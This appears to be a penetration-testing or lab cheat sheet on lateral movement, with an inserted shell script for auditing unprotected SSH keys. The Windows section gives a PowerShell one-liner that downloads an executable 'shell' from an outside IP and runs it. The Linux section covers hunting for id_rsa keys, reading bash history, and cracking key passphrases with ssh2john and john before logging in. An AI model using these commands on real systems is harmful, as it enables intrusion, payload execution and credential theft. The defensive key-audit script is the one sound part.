Windows

CanPSRemote

Enter-PSSession -ComputerName m3webaw.m3c.local

Upload shell

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.207:443/CASUAL_PLATFORM.exe', 'C:\Users\Charlene.Butcher\Documents\CASUAL_PLATFORM.exe')"

Execute shell

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ./CASUAL_PLATFORM.exe

Linux

SSH keys

find /home/ -name "id_rsa"
# Check whether the key is encrypted
cat svuser.key
cat known_hosts
tail .bash_history
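
Reading the key with cat only answers the question for legacy PEM keys, which announce encryption in a "Proc-Type: 4,ENCRYPTED" header line. The newer "BEGIN OPENSSH PRIVATE KEY" format has the same header either way and records the cipher name ("none" when unprotected) inside the base64 body. The script below is an added example, not part of the original notes, for auditing a host for private keys stored without a passphrase; the function name key_protection and the kp_* variables are this example's own.

```shell
#!/bin/sh
# Added example: report whether a private key file is passphrase-protected.
# Usage: sh keycheck.sh /home/*/.ssh/id_*   (script name is hypothetical)
# key_protection prints one of: encrypted | unencrypted | unknown
key_protection() {
    kp_file=$1
    if grep -q -- '-----BEGIN ENCRYPTED PRIVATE KEY-----' "$kp_file"; then
        # PKCS#8 container that is encrypted by definition
        echo encrypted
    elif grep -Eq -- '-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----' "$kp_file"; then
        # Legacy PEM: encryption is declared in a plain-text header line
        if grep -q '^Proc-Type: 4,ENCRYPTED' "$kp_file"; then
            echo encrypted
        else
            echo unencrypted
        fi
    elif grep -q -- '-----BEGIN PRIVATE KEY-----' "$kp_file"; then
        # Plain PKCS#8 has no encryption layer
        echo unencrypted
    elif grep -q -- '-----BEGIN OPENSSH PRIVATE KEY-----' "$kp_file"; then
        # Body layout: "openssh-key-v1" + NUL (15 bytes), a 4-byte length,
        # then the cipher name. 32 base64 characters decode to 24 bytes,
        # enough to reach the first 4 characters of the cipher name.
        kp_b64=$(grep -v -- '^-----' "$kp_file" | tr -d '\r\n ' | cut -c1-32)
        kp_magic=$(printf '%s' "$kp_b64" | base64 -d 2>/dev/null |
                   dd bs=1 count=14 2>/dev/null)
        kp_cipher=$(printf '%s' "$kp_b64" | base64 -d 2>/dev/null |
                    dd bs=1 skip=19 count=4 2>/dev/null)
        if [ "$kp_magic" != openssh-key-v1 ]; then
            echo unknown            # truncated or not really a key
        elif [ "$kp_cipher" = none ]; then
            echo unencrypted        # cipher "none": no passphrase set
        else
            echo encrypted          # e.g. a cipher name starting "aes2"
        fi
    else
        echo unknown
    fi
}

# Classify every file given on the command line.
for kp_arg in "$@"; do
    printf '%s\t%s\n' "$kp_arg" "$(key_protection "$kp_arg")"
done
```

Keys reported as unencrypted are usable by anyone who can read the file, so they are the ones to rotate or re-protect with ssh-keygen -p.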

If the key is encrypted, download the file and convert it with ssh2john

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

Crack the passphrase, then log in with the key

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash
ssh -i ./svuser.key svuser@controller

Lateral Movement from Internal Recon

Manual Enumeration